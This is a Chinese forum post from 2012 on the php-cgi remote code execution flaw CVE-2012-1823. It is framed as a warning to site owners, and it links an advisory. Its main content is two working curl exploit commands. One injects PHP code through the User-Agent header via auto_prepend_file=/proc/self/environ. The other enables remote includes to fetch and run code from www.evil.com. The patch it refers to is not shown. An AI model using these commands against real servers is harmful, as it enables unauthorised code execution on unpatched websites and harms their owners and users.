设为首页收藏本站

开启辅助访问

网站Portal

天空小小岛技术网站 › 门户 › 查看主题

php-cgi远程代码执行

发布者: s.Bo | 发布时间: 2012-5-4 14:49| 查看数: 10716| 评论数: 2|帖子模式

php-cgi远程代码执行，FastCGI不受影响。PHP官方暂时未发布补丁，请受影响的站长按文章下方提供的方式打好临时补丁。
http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/

1、本地包含直接执行代码:

curl -H "USER-AGENT: <?system('id');die();?>" http://target.com/test.php?-dauto_prepend_file%3d/proc/self/environ+-n

复制代码

2、远程包含执行代码:

curl http://target.com/test.php?-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3a%2f%2Fwww.evil.com%2fevil.txt

复制代码

分享0 收藏0 鲜花0 鸡蛋0

最新评论

kk7769640 发表于 2012-9-23 13:50:24

楼主太厉害了,谢谢分享!

浏览过的版块

Windows

小黑屋|手机版|Archiver|天空小小岛 |京ICP备2025130156号|

GMT+8, 2026-6-11 03:21 , Processed in 0.106204 second(s), 17 queries , Gzip On.

Powered by Discuz! X3.1

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表